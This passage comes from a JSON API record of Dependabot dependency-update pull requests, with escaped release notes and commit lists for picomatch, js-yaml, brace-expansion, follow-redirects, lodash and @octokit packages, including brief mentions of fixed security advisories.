href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.0.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains \u003ccode\u003econstructor\u003c/code\u003e by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e5474fc1a4d7991870058170407dda8a42be5334\"\u003e\u003ccode\u003ee5474fc\u003c/code\u003e\u003c/a\u003e Publish 4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\"\u003e\u003ccode\u003e4516eb5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\"\u003e\u003ccode\u003e5eceecd\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/0db7dd70651ca7c8265601c0442a996ed32e3238\"\u003e\u003ccode\u003e0db7dd7\u003c/code\u003e\u003c/a\u003e Run benchmark again against latest minimatch version (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/161\"\u003e#161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/95003777eb1c60dec09495a8231fa2ba4054d76a\"\u003e\u003ccode\u003e9500377\u003c/code\u003e\u003c/a\u003e docs: clarify what brace expansion syntax is and isn't supported (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/2661f23eca86c8b4a2b14815b9b2b3b74bd5a171\"\u003e\u003ccode\u003e2661f23\u003c/code\u003e\u003c/a\u003e fix typo in globstars.js test name (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/1798b07e9df59500b9cf567294d44d559032f4c7\"\u003e\u003ccode\u003e1798b07\u003c/code\u003e\u003c/a\u003e docs: fix \u003ccode\u003emakeRe\u003c/code\u003e example (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/143\"\u003e#143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/9d76bc57a03b7f57cc4ca516c8071daf632bafd8\"\u003e\u003ccode\u003e9d76bc5\u003c/code\u003e\u003c/a\u003e chore: undocument removed options (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e4d718bbfb47e4f030ab2612b5b04a9297fe272d\"\u003e\u003ccode\u003ee4d718b\u003c/code\u003e\u003c/a\u003e Remove unused time-require (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/38dffeb16221cc8eb8981524fb6895dd2aaaba76\"\u003e\u003ccode\u003e38dffeb\u003c/code\u003e\u003c/a\u003e chore(deps): pin dependencies (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/158\"\u003e#158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.0.4\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.3...4.0.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.0.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains \u003ccode\u003econstructor\u003c/code\u003e by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\"\u003ehttps://github.com/micromatch/picomatch/compare/4.0.2...4.0.3\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e5474fc1a4d7991870058170407dda8a42be5334\"\u003e\u003ccode\u003ee5474fc\u003c/code\u003e\u003c/a\u003e Publish 4.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/4516eb521f13a46b2fe1a1d2c9ef6b20ddc0e903\"\u003e\u003ccode\u003e4516eb5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/5eceecd27543b8e056b9307d69e105ea03618a7d\"\u003e\u003ccode\u003e5eceecd\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/0db7dd70651ca7c8265601c0442a996ed32e3238\"\u003e\u003ccode\u003e0db7dd7\u003c/code\u003e\u003c/a\u003e Run benchmark again against latest minimatch version (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/161\"\u003e#161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/95003777eb1c60dec09495a8231fa2ba4054d76a\"\u003e\u003ccode\u003e9500377\u003c/code\u003e\u003c/a\u003e docs: clarify what brace expansion syntax is and isn't supported (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/134\"\u003e#134\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/2661f23eca86c8b4a2b14815b9b2b3b74bd5a171\"\u003e\u003ccode\u003e2661f23\u003c/code\u003e\u003c/a\u003e fix typo in globstars.js test name (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/138\"\u003e#138\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/1798b07e9df59500b9cf567294d44d559032f4c7\"\u003e\u003ccode\u003e1798b07\u003c/code\u003e\u003c/a\u003e docs: fix \u003ccode\u003emakeRe\u003c/code\u003e example (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/143\"\u003e#143\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/9d76bc57a03b7f57cc4ca516c8071daf632bafd8\"\u003e\u003ccode\u003e9d76bc5\u003c/code\u003e\u003c/a\u003e chore: undocument removed options (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/146\"\u003e#146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/e4d718bbfb47e4f030ab2612b5b04a9297fe272d\"\u003e\u003ccode\u003ee4d718b\u003c/code\u003e\u003c/a\u003e Remove unused time-require (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/38dffeb16221cc8eb8981524fb6895dd2aaaba76\"\u003e\u003ccode\u003e38dffeb\u003c/code\u003e\u003c/a\u003e chore(deps): pin dependencies (\u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/158\"\u003e#158\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/picomatch/compare/4.0.2...4.0.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-...\n\n_Description has been truncated_","html_url":"https://github.com/accordproject/template-archive/pull/909","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/accordproject%2Ftemplate-archive/issues/909","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/909/packages"}},{"old_version":"6.1.2","new_version":"14.0.0","update_type":"major","path":null,"pr_created_at":"2026-05-04T01:31:00.000Z","version_change":"6.1.2 → 14.0.0","issue":{"uuid":"4373543510","node_id":"PR_kwDOSTbGDM7X2kbu","number":1,"state":"open","title":"build(deps): bump the npm_and_yarn group across 1 directory with 3 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":2,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-04T01:31:00.000Z","updated_at":"2026-05-04T06:07:28.477Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"npm_and_yarn","update_count":3,"packages":[{"name":"@octokit/plugin-paginate-rest","old_version":"6.1.2","new_version":"14.0.0","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"@octokit/request","old_version":"6.2.8","new_version":"10.0.8"},{"name":"@octokit/request-error","old_version":"3.0.3","new_version":"7.1.0"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 1 update in the / directory: [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js).\n\nUpdates `@octokit/plugin-paginate-rest` from 6.1.2 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/releases\"\u003e@​octokit/plugin-paginate-rest's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.1...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2025-10-31)\u003c/h1\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd immutable releases, enterprise team membership, enterprise team organization endpoints (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/413e8990ce34854cb3a7d22f8a7366ea6a1eb0d5\"\u003e413e899\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /projects/{project_id}/columns\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eRemove \u003ccode\u003eGET /enterprises/{enterprise}/secret-scanning/alerts\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.1\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/compare/v13.2.0...v13.2.1\"\u003e13.2.1\u003c/a\u003e (2025-10-20)\u003c/h2\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003edeps:\u003c/strong\u003e update \u003ccode\u003e@octokit/types\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/octokit/plugin-paginate-rest.js/issues/698\"\u003e#698\u003c/a\u003e) (\u003ca href=\"https://github.com/octokit/plugin-paginate-rest.js/commit/ba56fbcc7e41a9ae19b5f2c09d4b94f8e4c7d70a\"\u003eba56fbc\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev13.2.0\u003c/h2\u003e\n\u003ch1\u003e\u003ca 